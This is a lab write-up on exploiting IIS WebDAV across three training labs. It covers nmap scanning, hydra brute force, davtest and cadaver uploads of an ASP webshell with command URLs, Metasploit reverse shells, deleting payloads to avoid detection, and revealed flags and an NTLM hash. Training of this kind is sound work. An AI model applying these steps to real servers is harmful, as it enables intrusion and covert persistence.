search

iis-webdav

hashtag
Lab 1

🔬 Windows: IIS Server DAVTestarrow-up-right

  • Target IP: 10.3.26.115

  • IIS exploitation

  • Credentials provided: bob:password_123321

ping 10.3.26.115

nmap -sV -sC 10.3.26.115
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND LOCK UNLOCK PROPPATCH MKCOL PUT DELETE MOVE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to /Default.aspx
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/10.0
|_  Server Date: Fri, 10 Mar 2023 12:34:28 GMT
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3306/tcp open  mysql         MySQL (unauthorized)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: DOTNETGOAT
|   NetBIOS_Domain_Name: DOTNETGOAT
|   NetBIOS_Computer_Name: DOTNETGOAT
|   DNS_Domain_Name: DotNetGoat
|   DNS_Computer_Name: DotNetGoat
|   Product_Version: 10.0.17763
|_  System_Time: 2023-03-10T12:34:28+00:00
| ssl-cert: Subject: commonName=DotNetGoat
| Not valid before: 2023-03-09T12:25:30
|_Not valid after:  2023-09-08T12:25:30
|_ssl-date: 2023-03-10T12:34:36+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-10T12:34:33
|_  start_date: N/A

  • A http-enum script scan can also be done, focusing only on port 80:

browser check

hashtag
hydraarrow-up-right

hydra - a parallelized fast and flexible login cracker which supports numerous protocols to attack.

❗Pay attention with brute-force attacks as they can cause a DoS (Denial of Service)❗

  • Try hydra to brute force WebDAV in this case

  • Use the lab provided credentials instead, first in the web browser then with davtest tool

hashtag
davtestarrow-up-right

  • It sends exploit files to the WebDAV server and automatically creates the directory and uploads different format types of files, then it tries to execute uploaded files and gives an output of successfully executed files.

  • Use the provided credentials with davtest

davtest result

📌 Summary:

  • All important file types can be uploaded to the /webdav directory

  • .txt, .asp, .html files can be executed

hashtag
cadaverarrow-up-right

  • Use cadaver to upload an .asp payload to the /webdav directory

dav:/webdav/>

  • Access the backdoor using the browser

    • http://10.3.26.115/webdav/webshell.asp

  • Windows commands can be provided in the box

  • Run whoami, ipconfig or other commands to find the flag

  • dir C:\ command

    • http://10.3.26.115/webdav/webshell.asp?cmd=dir+C%3A%5C

  • type C:\flag.txt command

    • http://10.3.26.115/webdav/webshell.asp?cmd=type+C%3A%5Cflag.txt

chevron-rightReveal Flag: 🚩hashtag

0cc175b9c0f1b6a831c399e269772661

hashtag
Lab 2

🔬 Windows: IIS Server: WebDav Metasploitarrow-up-right

  • Target IP: 10.4.18.218

  • IIS exploitation with Metasploit

  • Credentials provided: bob:password_123321

  • Use davtest to get the all the file types that can be uploaded and executed on the IIS server

davtest Summary

  • Use Metasploit modulearrow-up-right to execute a payload and optain a reverse shell (meterpreter session) on the target system or use msfvenom to manually create a payload and use it with metasploit.

hashtag
msfvenomarrow-up-right - manual

  • Manually generate the .asp payload

  • Use cadaver to upload the generated shell.asp payload to the /webdav directory

Before executing the shell.asp, setup a listener/handler that will receive the reverse connection from the target and send the stage that provides with a meterpreter session when executed.

  • Open a new terminal tab and run Metasploit with database support

  • The listener (reverse TCP handler) starts listening and waits for a connection from the actual shell.asp payload

Metasploit handler

  • Open the http://10.4.18.218/webdav link in the browser and click on shell.asp file

  • The Meterpreter session will be opened

Meterpreter session opened

  • Get remote system info with sysinfo

sysinfo

  • Get the user that the server is running as with getuid

getuid

📌 No privilege escalation needed since the user is NT AUTHORITY\SYSTEM

❗ Once access is optained, the uploaded payloads can be deleted from the target system, to avoid detection!

  • Use cadaver to delete the shell.asp uploaded file

hashtag
metasploit - automatic

Metasploit iis_webdav_upload_asp

  • This exploit automatically deleted the /webdav/metasploit.asp payload

  • Find the flag, running meterpreter commands

chevron-rightReveal Flag: 🚩hashtag

d3aff16a801b4b7d36b4da1094bee345

hashtag
Lab 3 (Extra)

Windows: IIS Server Metasploit Backdoorarrow-up-right

  • Target IP: 10.4.23.148

  • IIS exploitation with Metasploit

  • Credentials provided: bob:password_123321

chevron-rightReveal Flag - Administrator NTLM Hash is: 🚩hashtag

5c4d59391f656d5958dab124ffeabc20

hashtag
Meterpreter Commands

Previouscreds-dumpNextrdp

Last updated